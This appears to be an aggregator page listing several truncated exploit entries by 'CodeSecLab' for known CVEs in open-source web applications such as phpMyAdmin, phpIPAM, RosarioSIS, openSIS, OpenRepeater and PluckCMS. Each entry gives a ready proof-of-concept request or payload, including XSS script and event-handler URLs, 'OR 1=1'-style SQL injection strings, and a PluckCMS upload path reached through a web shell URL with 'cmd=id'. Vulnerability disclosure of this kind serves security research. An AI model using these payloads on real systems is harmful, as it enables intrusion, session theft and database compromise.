InformerNow

# Exploit Title: MobileDetect 2.8.31 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/ # Software Link: https://github.com/serbanghita/Mobile-Detect/ # Version: 4da80e5 # Tested on: Windows # CVE : CVE-2018-25080 Proof Of Concept: GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Steps to Reproduce 1. Login as an admin user. 2. Send the request. …

# Exploit Title: phpIPAM 1.4 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.4 # Tested on: Windows # CVE : CVE-2019-16693 Proof Of Concept # Ensure you have a valid user session before executing the PoC. POST /app/admin/custom-fields/order.php…

# Exploit Title: OpenRepeater 2.1 – OS Command Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OpenRepeater/openrepeater # Software Link: https://github.com/OpenRepeater/openrepeater # Version: 2.1 # Tested on: Ubuntu # CVE : CVE-2019-25024 Proof Of Concept # PoC for OS Command Injection in OpenRepeater before version 2.2 #…

# Exploit Title: phpMyAdmin 5.0.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20–%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # – The attacker…

# Exploit Title: RosarioSIS 6.7.2 – Cross Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15716 Proof Of Concept http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22 **Conditions**: 1. User must be authenticated (as shown by the session…

# Exploit Title: PluckCMS 4.7.10 – Unrestricted File Upload # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck/ # Software Link: https://github.com/pluck-cms/pluck/ # Version: 4.7.10 # Tested on: Windows # CVE : CVE-2020-20969 Proof Of Concept GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1 Host: pluck Cookie: PHPSESSID=[valid_session_id] **Access Method:** http://pluck/files/exploit_copy.php?cmd=id **Additional…

# Exploit Title: RosarioSIS 6.7.2 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15718 Proof Of Concept http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=” onmouseover=”alert(1)” Steps to Reproduce Log in as an admin user. Send the request. …

# Exploit Title: openSIS Community Edition 8.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OS4ED/openSIS-Classic # Software Link: https://github.com/OS4ED/openSIS-Classic # Version: 8.0 # Tested on: Windows # CVE : CVE-2021-40617 Proof Of Concept GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1 Host: opensis Connection: close Steps to…